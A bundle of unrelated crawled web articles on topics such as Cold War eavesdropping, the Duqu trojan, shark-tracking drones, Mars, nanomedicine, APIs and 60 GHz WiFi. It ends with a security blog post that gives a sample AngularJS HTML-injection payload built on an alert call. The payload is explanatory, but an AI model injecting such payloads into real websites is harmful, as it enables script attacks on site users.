The technical know-how incorporated into these devices, is, in general, used for legitimate purposes in other fields. In recent years we have heard much about the laser beam. There are over two hundred companies engaged in laser research and development. The laser offers promising possibilities in the medical field since its ability to cut is so fine that a scalpel no larger than a pinpoint could not duplicate its delicate accuracy. There are harmful effects possible with the laser, too. Experiments have shown that the laser could be beamed through a closed window to take out the sound in the room. The only limiting factor to this feat at the present time is the size of the equipment required. As soon as miniaturization is achieved, such eavesdropping will be a simple matter. It is safe to predict that in the near future the laser beam will not only be used to take the sound out of a room, but will also be used to take out a visual image of whatever is going on within that room.
As I pointed out to the Legislative Committee in Boston, Massachusetts, there is not one state in the Union that has included in its eavesdropping laws the word “picture”. The statutes refer only to the overhearing of a spoken word. I recommended to the Committee that it include the idea of “picture”. As I explained, the new development known as video telephone, introduced by the telephone company at the New York World’s Fair in 1965, enables two parties to not only converse, but to also see each other on a TV screen at the same time. The telephone company proudly stated that this service would soon be expanded and made available to any subscriber who wanted it. I cautioned the Committee that, just as the ordinary telephone in the home can now be adapted into a live microphone, circuitry would enable the technician to jump the video phone in a way to make the video portion send out a continuous picture even when the phone was not in use. Frightening as this may seem, it does not compare with the possibilities that lie ahead.
from Chapter 18 - A Matter of Privacy - A final thought...
In this complicated modern world which has given us inter-continental ballistic missiles, satellite spies and atomic warheads, and which has reduced warfare to split-second, push-button decision-making, we have been forced to grant to our national leaders sweeping emergency powers that would have made our Founding Fathers shudder. We can accept all of this because it affects not only the survival of our country, but the future of the world.
In every other area, however, we must strengthen our individual freedom and our personal liberties. We have the money, the technical know-how and the man-power to keep ourselves free from external aggression. But advances in the technology of eavesdropping have made possible the total invasion of our privacy. We are in serious danger of destroying from within the very freedom we so earnestly seek to preserve. It will serve us well to remember that “where justice ends, tyranny begins.” *
Copyright © 1968 B.R. Fox
Library of Congress Catalog Card Number: 68-18702
* On the United States Department of Justice building in Washington DC, there are five words engraved in stone... "Wherever Law ends, Tyranny begins." John Locke, 1690
— THANK YOU! | <urn:uuid:fc7b1853-61cc-4e91-8041-aa4a3d51df75> | CC-MAIN-2017-09 | http://counterespionage.com/1968-bernard-spindel-the-ominous-ear.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00180-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963008 | 3,291 | 3.3125 | 3 |
A survey by Trend Micro suggests that British teens might be tempted by illegal online methods to make money. One in three teens (aged 12 – 18) admitted they would consider hacking or spying on people online if it meant they could make some fast cash. The survey exposes lack of “e-morals” at a time where kids are spending a significant amount of their time online.
The survey, which polled 1,000 teens and parents across the UK, revealed that kids don’t appear to have any sense of netiquette when it comes to their online behavior. It found:
- Over one in 10 teens thought it was “cool’ or “funny’ to pretend to be someone else online
- One in seven 12 to 13 year olds have actually done this
- Over four out of ten teens have hacked into another person’s profile to read emails or looked at bank account details or logged onto another persons social networking profile
- One in three teens have admitted to being tempted to try hacking or spying on the internet to make money
- Boys it would seem, were almost twice as likely as girls to log into someone’s social networking site
- Girls were up to three times more likely than boys to enter into someone’s online shop or bank accounts without the owner knowing.
Tips for protecting your kids online
- Keep all computers in common areas.
- Agree to time limits for using the Internet and all social devices.
- Keep software security up-to-date.
- Talk with your kids about entering personal information online.
- Run a manual scan with your software security and check browser history.
- Set profiles on social networking sites to private.
- Encourage children to be respectful of others.
- Teach children to have multiple passwords that are NOT associated with names, nicknames or commonly found information over the net.
- Most importantly, keep informed about the latest outbreaks and dangers on the Internet. | <urn:uuid:a93fe59b-c175-48be-8da3-b8974a95bc60> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2009/04/03/survey-shows-teens-would-spy-on-people-online-for-money/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00356-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9432 | 406 | 2.9375 | 3 |
Imagine floating on the empty blue Pacific Ocean, nothing but water in every direction, sunrise to sunset. Yet under the surface swim thousands of great white sharks.
That's not a bad dream - it's actually what happens around this time of year several thousand miles off the coast of Baja California, about halfway to Hawaii. The king predators congregate in a huge area of the ocean nicknamed the White Shark Cafe.
But why the big sharks favor this remote spot remains a mystery. The area is sometimes called "the desert of the ocean," and Sal Jorgensen, a research scientist at the Monterey Bay Aquarium, says there is little observable life to sustain a food chain. While there, the sharks assume bizarre behavior, sometimes diving thousands of feet at intervals as short as 10 minutes.
Scientists believe the white sharks congregate to find food and to find a mate, hence the idea of a "cafe" - but only better research can determine whether the shark gathering is more "restaurant" or "motel."
"We know very little," Jorgensen said, joking that it seems like Burning Man for white sharks.
A lack of sensory equipment makes it hard for researchers to find out what's happening below the surface of the water. Most data for studying sharks, or any ocean phenomenon, are gathered by buoys (which are immobile), satellites (which are inexact, usually confined to surface measurements and not always in range) or scientists on ships (which are expensive and time-consuming).
This is where drones come in.
Autonomous craft are reshaping the way scientists study the ocean, and two Bay Area companies, Liquid Robotics and upstart Saildrone, funded by the Marine Science and Technology Foundation (founded by Google Chairman Eric Schmidt), have been making waves with their unmanned gliders and sailboats. Saildrone recently completed a voyage around Hawaii and back to the Bay Area with its autonomous sailboats. But now the group must prove its crafts can do more than simply get from point A to point B - like gather critical ocean data.
"The next stage is to demonstrate that we can do real, valuable science," said Saildrone lead researcher Richard Jenkins.
The startup, which has a workshop in a hangar on Alameda's old Navy base, attaches shark sensors to its craft's keel. Getting sensors under the surface is key. As the drone passes within range of the shark, the sensor picks up its acoustic tag and beams the data back to mission control. Without the drone, researchers have to wait until the tag pops off (usually about a year) and then retrieve it via ship, which can cost tens of thousands of dollars per day. Then researchers must assemble the animal's activities retroactively.
The hope is that with drones periodically transmitting data as they traverse the White Shark Cafe, or any other area of interest, observations occur in real time - and at far less expense. Jorgensen and Stanford marine biologist Barbara Block, who is working with Liquid Robotics and Saildrone, hope for better data, such as the animal's exact positions in the water column at certain moments, giving them a 3-D perspective. This indicates whether (and what) the sharks are hunting, potentially helping scientists understand the purpose of the Cafe, not to mention other migratory and feeding habits. Block hopes for similar discoveries with bluefin tuna and other pelagic fish, which inhabit the open ocean away from shore and sea floor.
"You'd think we know, but we don't," she said. "It's a very inaccessible world."
The Stanford group has tried to open some of that world to the public with the Shark Net app for iPhones, which lets anyone monitor and see pictures of tagged fish, but continuous information is tricky. "This is a great concept, but the data is not up-to-date," notes a top comment in the iTunes Store. "Would be a great app if it was kept current."
Keeping information current is only one challenge. Saildrone must also make sure its instrumentation remains accurate in the brutal marine environment, where heat and cold can warp calibration. Jenkins and Co. are working with the National Oceanic and Atmospheric Administration to fine-tune the sensors. Even a slight deviation can make an entire data set meaningless.
"Just because you collect a number, doesn't mean it's right," Jenkins said.
Florida State University oceanographer Ian MacDonald hopes the drones will provide data to better predict tropical storms. Satellites, he says, can only measure surface temperatures - but temperature below the surface is vital for researchers.
"Anything that will give us a better handle would be very important," he said.
And drones could also map areas previously tricky for ships. Saildrone's crafts only cut 6 feet under the water, so it can navigate shallow areas - meaning it could take far more nuanced pictures of the ocean floor and save on the fuel compared with the boats currently performing the task.
The drones cost almost nothing to operate and are relatively simple to control and monitor. Provide destination coordinates, and off it goes - the command software is simple enough to run in a Web browser and Jenkins occasionally monitors the craft from his iPhone (via a private website). The vessel has small solar panels to power the onboard computers and sensors, but the drone moves completely on wind power.
But the drones can't stay at sea forever. Despite protective paint and a streamlined design, algae and other sea life will eventually coat the craft and slow it down, meaning it has to come back to shore for cleaning and a tune up.
The drone's hull is shaped something like a big pelagic fish, but Jenkins says sharks haven't mistaken it for prey yet. In fact, when they've sailed near marine life, the animals don't make much fuss. Crafts with engines usually have them scrambling to get away. Because the drones are silent, Jenkins believes animals don't pay much mind, viewing them as pieces of fast-moving driftwood.
This sort of detailed insight into the lives of sharks presents something of a double-edged sword. Researchers need to publish data so activists and governments know where to establish marine conservation zones. But that data also inform fisherman, many of whom disregard catch limits on threatened species or even brutalize animals by slicing off shark fins for soup and leaving them to die.
"We're always faced with this dilemma," said Jorgensen.
Yet, to add one more bullet to the list of tasks these machines could perform, Jenkins has worked with government agencies to test drones for patrolling protected fisheries and taking pictures of boats violating the rules. Those discussions are also in very early stages.
Drones haven't proven to be a panacea for answering marine science questions quite yet. But Block is hopeful.
"These are the modern-generation tools to study the ocean," she said.
©2014 the San Francisco Chronicle | <urn:uuid:97f21b20-f2de-4269-b542-ecc0b8dea6f9> | CC-MAIN-2017-09 | http://www.govtech.com/products/Scientists-Develop-Drones-to-Study-Habits-of-Sharks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00056-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951034 | 1,407 | 2.828125 | 3 |
Could some sort of briny water be flowing on Mars during its warm season? Seems that may be the case as NASA today said its red planet-orbiting satellite spotted possible flowing water, furthering the idea that Mars has or still does harbor life.
The results from NASA's Mars Reconnaissance Orbiter are the closest scientists have come to finding evidence of liquid water on the planet's surface, NASA said. Frozen water, however has been detected near the surface in many middle to high-latitude regions.
More on space: 10 wicked off-the-cuff uses for retired NASA space shuttles
NASA today said: "Dark, finger-like features appear and extend down some Martian slopes during late spring through summer, fade in winter, and return during the next spring. Repeated observations have tracked the seasonal changes in these recurring features on several steep slopes in the middle latitudes of Mars' southern hemisphere. Some aspects of the observations still puzzle researchers, but flows of liquid brine fit the features' characteristics better than alternate hypotheses. Saltiness lowers the freezing temperature of water. Sites with active flows get warm enough, even in the shallow subsurface, to sustain liquid water that is about as salty as Earth's oceans, while pure water would freeze at the observed temperatures."
NASA went on to say images show flows are only about 0.5 to 5 yards or meters wide, with lengths up to hundreds of yards. The width is much narrower than previously reported gullies on Martian slopes. However, some of those locations display more than 1,000 individual flows. Also, while gullies are abundant on cold, pole-facing slopes, these dark flows are on warmer, equator-facing slopes.
"The best explanation for these observations so far is the flow of briny water," said Alfred McEwen of the University of Arizona, Tucson in a statement. McEwen is the principal investigator for the orbiter's High Resolution Imaging Science Experiment (HiRISE) and lead author of a report about the recurring flows published in Thursday's edition of the journal Science.
Follow Michael Cooney on Twitter: nwwlayer8
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:c46924f1-08fe-4cdd-a1a7-0412532a5a91> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2220346/security/nasa-satellite-may-have-found-water-on-mars.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00584-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950246 | 448 | 3.21875 | 3 |
In June 2010, the world became aware of Stuxnet, largely considered to be the most advanced and dangerous piece of malware ever created. But before you run to check that your antivirus software is up to date, note that Stuxnet, largely believed to be state-created, was created with one singular purpose in mind - to cripple Iran's ability to develop nuclear weapons.
When security researches began studying Stuxnet more closely, they were astonished at its level of sophistication. Stuxnet's ultimate aim, researches found, was to target specialized Siemens industrial software and equipment employed in Iran's Nuclear research facilities. The original Stuxnet virus was able to deftly inject code into the Programmable Logic Controllers (PLC) of the aforementioned Siemens industrial control systems.
The end result, according to foreign reports, is that Stuxnet was able to infiltrate an Iranian uranium enrichment facility and subsequently destroy over 1,000 centrifuges, albeit in a subtle manner as to avoid detection from Iranian nuclear scientists.
In the wake of Stuxnet, researchers weren't shy about proclaiming that new era of sophisticated malware was upon us.
This past September, a new variant of Stuxnet was discovered. It's called Duqu and security experts believe it was developed in conjunction with Stuxnet by the same development team. After studying the software, security firm Symantec said that the Duqu virus was almost identical to Stuxnet, yet with a "completely different purpose."
The reported goal of the Duqu virus wasn't to sabotage but rather to acquire information.
A research report from Symantec this past October explained,
Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created since the last Stuxnet file was recovered. Duqu's purpose is to gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party. The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility.
And just when you thought the whole Stuxnet/Duqu trojan saga couldn't get any crazier, a security firm who has been analyzing Duqu writes that it employs a programming language that they've never seen before.
Security researchers at Kapersky Lab found the "payload DLL" of Duqu is comprised of code from an unrecognizable programming language. While many parts of the Trojan are written in C++, other portions contain syntax that security researchers can't pin back to a recognizable programming language.
After analyzing the code, researchers at Kapersky were able to conclude the following:
- The Duqu Framework appears to have been written in an unknown programming language.
- Unlike the rest of the Duqu body, it's not C++ and it's not compiled with Microsoft's Visual C++ 2008.
- The highly event driven architecture points to code which was designed to be used in pretty much any kind of conditions, including asynchronous commutations.
- Given the size of the Duqu project, it is possible that another team was responsible for the framework than the team which created the drivers and wrote the system infection and exploits.
- The mysterious programming language is definitively NOT C++, Objective C, Java, Python, Ada, Lua and many other languages we have checked.
- Compared to Stuxnet (entirely written in MSVC++), this is one of the defining particularities of the Duqu framework.
Consequently, Kapersky decided to reach out to the programming community to help them figure out which programming language the Duqu Framework employs. As of Sunday evening, nothing conclusive has been found, but a comment on Kapersky's blog post might prove useful.
The code your referring to .. the unknown c++ looks like the older IBM compilers found in OS400 SYS38 and the oldest sys36.The C++ code was used to write the tcp/ip stack for the operating system and all of the communications. The protocols used were the following x.21(async) all modes, Sync SDLC, x.25 Vbiss5 10 15 and 25. CICS. RSR232. This was a very small and powerful communications framework. The IBM system 36 had only 300MB hard drive and one megabyte of memory,the operating system came on diskettes.This would be very useful in this virus. It can track and monitor all types of communications. It can connect to everything and anything.
While many other suggestions via the comment section were dismissed by Kapersky lab expert Igor Soumenkov, the one above netted a "Thank you!"
Another tip that Soumenkov seemed excited about identifies the unknown language as Simple Object Orientation (for C), but not without some reservations.
SOO may be the correct answer! But there are still two things to figure out:
1) When was SOO C created? I see Oct 2010 in git - that's too late, Duqu was already out there.
2) If SOO is the toolkit, then event driven model was created by the authors of Duqu. Given the size of framework-based code, they should have spent 1+ year making all things work correctly.
...It turns out that almost the same code can be produced by the MSVC compiler for a "hand-made" C class. This means that a custom OO C framework is the most probable answer to our question.
We kept this (OO C) version as a "worst-case" explanation - because that would mean that the amout of time and effort invested in development of the Framework is enormous compared to other languages/toolkits.
Note that work on Duqu, according to researchers, began sometime in 2007. And as for the enormous amount of work Soumenkov refers to, remember that most researchers believe Stuxnet and its bretheren were created by state actors. Many believe Israel and the United States may have worked together on the project to stymie Iran's nuclear weapons plans. Others believe Stuxnet may be the handiwork of China. | <urn:uuid:eff17073-61d2-46c9-b2ab-cb088a8b24fe> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2221881/security/duqu-trojan-contains-unknown-programming-language.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171043.28/warc/CC-MAIN-20170219104611-00228-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962733 | 1,295 | 2.8125 | 3 |
Oh yes, that’s a real thing even if YOUR browser thinks “affective” is not a word and shames it with a red squiggly. Affective forecasting is the act of predicting an emotional reaction to some hypothetical future event. We use it frequently. Have you ever filled out a survey that asked you how likely you would be to refer a friend to some company? That’s affective forecasting.
Affective forecasting has great uses, but it has serious drawbacks. In my research on the Consumer’s Attitudes Toward Breaches, we learned that nearly every survey related to the study of breached merchants was flawed. In fact, when you ask someone how they will react to a hypothetical event, societal norms will kick in that could cause them to give a false answer. Here’s a real-world example that happened over the weekend.
My niece is now in high school—which is terrifying enough it its own right—and the peer pressure is mounting. Her mother was talking about a real-world scenario in which someone in an authoritative position would request her to do something like ride in a parent’s personal vehicle for a school sponsored event. Now, with the manner in which she asked, of course my niece would respond with “no.” But would she actually get in that vehicle when the situation goes from hypothetical to real? We’ll have to wait and see.
Ultimately, I speculate that external pressures and the fact that someone is observing the answer will cause someone to answer the way that they think they are supposed to, as opposed to accurately forecast their behavior. It’s important for researchers (academics or practitioners) to realize that they may be introducing bias when affective forecasting is used in the response. | <urn:uuid:834d8e23-7a67-4087-9fb8-1c2d6290bd4a> | CC-MAIN-2017-09 | https://www.brandenwilliams.com/blog/2016/08/16/affective-forecasting-strikes-again/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00104-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9767 | 368 | 2.75 | 3 |
In a second report this week on scientists' use of nanotechnology to battle cancer, researchers at MIT announced a new way to use nanoparticles to give cancerous cells a one-two punch.
MIT reported that researchers used nanoparticles to carry two drugs and release them one at a time. The treatment was shown to "dramatically shrink" lung and breast tumors in mice.
"I think it's a harbinger of what nanomedicine can do for us in the future," said Paula Hammond, an MIT professor of engineering, in a statement. "We're moving from the simplest model of the nanoparticle -- just getting the drug in there and targeting it -- to having smart nanoparticles that deliver drug combinations in the way that you need to really attack the tumor."
The university explained that first the nanoparticles disarm the cancer cell's defenses by releasing a drug called Erlotinib, also known as Tarceva, which shuts down one of the pathways that promote uncontrolled tumor growth. Then the nanoparticles release another drug called Doxorubicin, also known as Adriamycin.
Once weakened by the administering of the Erlotinib, the cancer cells are more susceptible to being treated with the second drug.
"It's like rewiring a circuit," said Michael Yaffe, an MIT professor. "When you give the first drug, the wires' connections get switched around so that the second drug works in a much more effective way."
Scientists have known that treating cancer patients with the prolonged attack of two or more drugs can bring greater success than using one medication. In more recent years, they've also determined that the specific timing of the drug delivery has a significant affect on the outcome.
According to MIT, using Erlotinib and Doxorubicin in a specifically timed succession proved a powerful tool to beat back a specific type of breast cancer known as triple-negative tumors, an aggressive cancer that tends to strike young women.
To deliver these drugs, the scientists turned to nanotechnology.
The researchers designed the nanoparticle so that the Erlotinib is embedded in the outer layer of it, while Doxorubicin is inside the particle's core. The particles are coated with a polymer, protecting them from breaking down in the body or being filtered out by the liver and kidneys.
Once the particles reach the tumor, they work their way inside the cancerous cells and begin to break down. Since the Erlotinib is in an outer layer of the particles, it is released first. By the time the second drug is released, the first drug has had enough time to weaken the cancer's defenses.
"There's a lag of somewhere between four and 24 hours between when Erlotinib peaks in its effectiveness and the doxorubicin peaks in its effectiveness," said Yaffe.
The treatment has been tested on triple-negative breast tumors, along with non-small-cell lung tumors. Both types of cancers were shrunk significantly, according to MIT.
Earlier this week, researchers at Johns Hopkins University reported that they have used nanoparticles as Trojan horses that deliver "death genes" to kill brain cancer cells beyond the reach of surgeons.
This particular nano-based treatment, which focused on glioblastomas, the most lethal and aggressive form of brain cancer, uses biodegradable nanoparticles that deliver genes that induce death in cancer cells but don't affect healthy cells.
The Johns Hopkins treatment has been tested on mice but not on humans.
This article, MIT uses nanotech to hit cancer with one-two punch, was originally published at Computerworld.com.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "MIT Uses Nanotech to Hit Cancer with One-Two Punch" was originally published by Computerworld. | <urn:uuid:2e34d4ba-4d6e-4975-9225-b020dc114e79> | CC-MAIN-2017-09 | http://www.cio.com/article/2376377/healthcare/mit-uses-nanotech-to-hit-cancer-with-one-two-punch.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172783.57/warc/CC-MAIN-20170219104612-00280-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954147 | 851 | 3.28125 | 3 |
APIs have been making the news lately, especially with Apple’s release of Metal API for iOS. But APIs themselves have been around for a long time. They’re a necessity in today’s ever-changing tech landscape, which is why understanding them is key to providing users with the interoperability they now require.
What is an API?
An API (short for “Application Programming Interface”) is a set of requirements that determine how one application can talk to another.
Why do APIs matter?
The short answer: APIs help make your life easier by making things more efficient. Say you have an application that checks the weather forecast for rain and, if there’s a chance of rain, it’ll display an umbrella icon on your home screen. The app does this by pulling the day’s forecast from weather.com.
Here’s the difference an API would make in our example app:
Without an API:
The app checks the current weekly forecast by opening http://www.weather.com/ and reading the webpage much like a human user would, interpreting the content as it goes. The app knows to look for the weekly forecast in one specific area of the site. However, if the site changes its layout, the app won’t work anymore.
With an API:
The app will call the message listed in weather.com’s API that returns the weekly forecast. Regardless of what the website looks like, the app will get the data it needs and will function as it should.
As you can see, APIs not only make interoperability possible, but offer a host of other benefits like improving functionality and streamlining processes.
How APIs work
APIs themselves are a series of different XML messages, each XML message corresponding to a different function. For example, a cloud hosting API may have an XML message that corresponds with creating a cloud server and one that will reboot a cloud server.
To tap into this functionality, a developer will write code that generates the right XML messages to either create or reboot a server and voila! The servers will be created or rebooted in real time, all without needing to log into a portal.
Advantages of using an API
Part of the reason why releasing APIs has become so popular is because of how much they benefit users. Some of the main benefits are:
- Easy integration. With an API available, developers can easily integrate other services into their existing software.
- Processes are streamlined. Back to our cloud hosting example, developers could integrate cloud hosting functionality into existing applications so companies wouldn’t need to train IT staff and employees on how to administer and use new software.
- It empowers users. APIs enable users to better access and customize a service in a way that suits their needs directly.
Thus, companies who release APIs allow their customers to access their services in newer, more efficient ways. If you’re interested in learning more about APIs and what they can do for you from a cloud perspective, check out our API here. We’d love to get your feedback on it, and know how you’re using it to power your business. | <urn:uuid:6ec71613-9f3d-41a6-92b0-8f297fe57c80> | CC-MAIN-2017-09 | http://www.codero.com/blog/apis-101-what-you-need-to-know-about-the-keys-to-the-kingdom/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00049-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.920744 | 658 | 3.203125 | 3 |
Baidu, , China's leading search engine, is making available Chinese language APIs for its four key speech technologies: Long Utterance Speech Recognition, Far-Field Speech Recognition, Expressive Speech Synthesis and Wake Word.
Baidu said its intent is to provide developers with access to its AI-based technologies. Baidu has also released API for facial recognition, optical character recognition, natural language processing and others. In September, the company also open sourced its deep learning framework PaddlePaddle, an easy-to-use platform allowing developers to apply deep learning to their products and services.
"We are at the dawn of the AI era. By opening our AI technologies, we will make it easier for everyone to create AI-enabled applications," says Andrew Ng, chief scientist of Baidu.
In just three years, the daily requests for speech recognition grew from 5 million in 2013 to 140 million this year, and the number of daily requests for speech synthesis stands today at 200 million. In the meantime, the number of developers using Baidu's speech system has also grown from 10,000 in 2014 to 140,000 this year. | <urn:uuid:62f65905-ba0e-49ef-a506-05be427bca5e> | CC-MAIN-2017-09 | http://www.convergedigest.com/2016/11/baidu-opens-chinese-language-apis-for.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00049-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94636 | 238 | 2.65625 | 3 |
Cooling Data Center CostsBy Samuel Greengard | Posted 2010-08-13 Email Print
Roughly 40 percent of the energy consumed in data centers is a result of cooling systems, and that figure is rising. Reversing that trend is possible, and could mean big savings.
One of the hottest opportunities for greening the data center lies in cooling.
According to Booz & Co., roughly 40 percent of the energy consumed in data centers is a result of cooling systems, and that figure is rising. Here’s what Booz recommends to increase cooling efficiency:
• Optimize airflow in the data center to reduce the mean gradient temperature and reduce cooling requirements.
• Use a hot/cold aisle configuration, in which equipment racks are arranged in alternating rows of hot and cold aisles.
• Rely on air handlers to better control airflow within the data center and enable more efficient cooling.
• Deploy smart cooling energy-management systems with sensors to reduce energy consumption by as much as 40 percent.
• Increase cooling temperature targets to slightly above the data center baseline temperature. Every added degree results in an estimated
4 percent reduction in energy consumption.
• Install renewable cooling sources such as outside air during the winter—where practicable—to minimize usage of internal cooling systems. | <urn:uuid:0e34533e-eff2-4220-a2b8-4cfc9c376e48> | CC-MAIN-2017-09 | http://www.baselinemag.com/c/a/IT-Management/Cooling-Data-Center-Costs-368334 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00401-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.913103 | 263 | 2.609375 | 3 |
High-wireless act: Can high-frequency WiFi be practical?
- By Greg Crowe
- Oct 16, 2012
This article has been updated to correct an inaccurate reference to the 60 GHz band as 60 MHz.
As agencies continue to build out wireless networks and extend the use of mobile devices, a new spectrum specification, which will add a lot of speed and capacity, could become a key factor in how well those networks function.
In a recent article explaining the wireless spectrum allocation situation, we touched on the 60 GHz band that the Wireless Gigabit Alliance (WiGig) proposes to use for the next generation of wireless networking, IEEE 802.11ac.
But although the bandwidths are quite roomy up there in the 60 GHz band — more than 50 times as wide as in the current Institute of Electrical and Electronics Engineers (IEEE) 802.11n specification, enough to allow streaming of uncompressed video — there is an innate hurdle to working with higher frequencies: signal propagation loss over distance.
Since the air is made up of randomly-arranged molecules of matter, any waveform signal sent through them has a chance of being bounced off of whatever it runs into. Higher-frequency waves are more susceptible to signal loss than lower-frequency ones because of this.
A good example exists in everyday nature. Light on the blue end of the visible spectrum has a higher frequency than on the red end. When the sun’s light hits the atmosphere, the blue light scatters more, so the sky looks blue. When the sun is low on the horizon, its light has to go through even more atmosphere to reach you, making the sun look more reddish. So now if your kids ask why the sky is blue, you’ll know what to tell them.
WiGig proposes several ways to combat this innate problem. For one, the alliance is continuing to refine the multiple-input multiple-output (MIMO) antenna configuration that was first implemented in 802.11n. With MIMO, several antennae are all talking to each other to determine the best path to the other station. The 802.11ac standard doubled the MIMO streams used in ‘n’ from 4 to 8, so what WiGig is working on will likely have at least that many.
But the area that will likely have the greatest impact on the practical range of WiGig-designed devices is in the precoding stage of the MIMO process. This is when the device will use what is called “beamforming” to focus the signal. This process, an example of which is illustrated in the accompanying graphic by Stephane Dedieu, uses the multiple antennae to combine into a phased array. The signal produced will experience constructive interference in one direction and destructive in other directions.
So the signal will go farther in the desired direction. This type of transmission is also sometimes called “unidirectional,” meaning that a signal with beamforming will go much farther than it would without it. How far will depend upon the technological improvement that happen between now and when WiGig and the IEEE come out with the new specification based on WiGig’s current research.
Greg Crowe is a former GCN staff writer who covered mobile technology. | <urn:uuid:f7363859-6ac8-455e-bf76-9712da4e40f4> | CC-MAIN-2017-09 | https://gcn.com/articles/2012/10/16/explainer-60-mhz-wifi-band-signal-propagation-loss.aspx?admgarea=TC_Mobile | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00449-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943038 | 678 | 2.953125 | 3 |
- By Bruce McConnell
- Nov 12, 2000
International cybercrime — attacks on mission-critical government or private
computers from across national boundaries — is an increasing threat. Can
Self-protection through strong secur-ity tools and practices remains
the principal defense. Ultimately, however, governments must address the
investigation of cybercrimes and the prosecution of criminals. Most countries
recognize the need to update their laws to fight crimes committed in cyberspace.
But countries today mostly are in the same boat that the Philippines was
in after the "love bug" struck in May — they have no effective legal tools
to prosecute cybercriminals. As with many issues, it often takes a crisis
to precipitate action. In June, the Philippines outlawed most computer crimes
as part of a comprehensive e-commerce statute.
To prosecute crimes across national borders, an act must be a crime
in both jurisdictions. Thus, though local legal traditions must be respected,
nations must define cybercrimes similarly. One approach to encourage such
harmony is to develop a model law that can be adapted to local conditions.
Such an effort is underway in the Council of Europe (COE).
The COE, Europe's oldest political organization, has created model laws
and treaties covering human rights, education and the environment. Its Draft
Convention on Cyber Crime was crafted by law enforcement officials from
Europe, the United States and Japan.
The convention will address a range of cybercrimes, including illegal
access, illegal interception, data interference, system interference, computer-related
forgery, computer-related fraud, and the aiding and abetting of these crimes.
It also tackles investigational matters related to jurisdiction, extradition,
the interception of communications, and the production and preservation
of data. And it sets minimum standards for penalties.
As with most cybersecurity initiatives, the COE's framework is controversial.
The computer industry argues that it had little meaningful input in the
draft convention. The COE accepts comments on its draft, then releases a
revision. The latest version is at www.coe.int.
Industry believes requiring service providers to monitor communications
and provide assistance to investigators would be burdensome and costly.
It also objects to a provision criminalizing the use of hacking programs,
which may have been designed for legitimate security testing purposes.
The Global Internet Liberty Campaign (www.gilc.org) has joined the opposition,
objecting to a lack of procedural safeguards and due process to protect
individuals' rights. It believes ensuing national laws might place restrictions
on privacy, anonymity and encryption.
The council wants to finish its work by the end of the year, after which
member nations and others could sign on to the convention and implement
the provisions in their own laws. In the meantime, government and industry
should engage the COE process at all levels to ensure a workable outcome.
McConnell, former chief of information policy and technology at the Office
of Management and Budget, is president of McConnell International LLC (www. | <urn:uuid:24766320-ce88-4242-ac9b-379cc372d317> | CC-MAIN-2017-09 | https://fcw.com/articles/2000/11/12/responding-internationally.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00445-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927379 | 638 | 2.9375 | 3 |
In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)
Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (later to be Richard III) defends his treatment of certain subjects, with two notable exceptions:
Unless it were a bloody murderer,
Or foul felonious thief that fleec’d poor passengers,
I never gave them condign punishment.
Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.
Well, hackers code, too.
The most boring of HTML injection examples is to display an
alert() message. The second most boring is to insert the
There are two important reasons for taking advantage of DRY in a web hack:
- Avoid incompetent blacklists (which is really a redundant term).
- Leverage code that already exists.
For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:
angular.bind(self, alert, 9)()
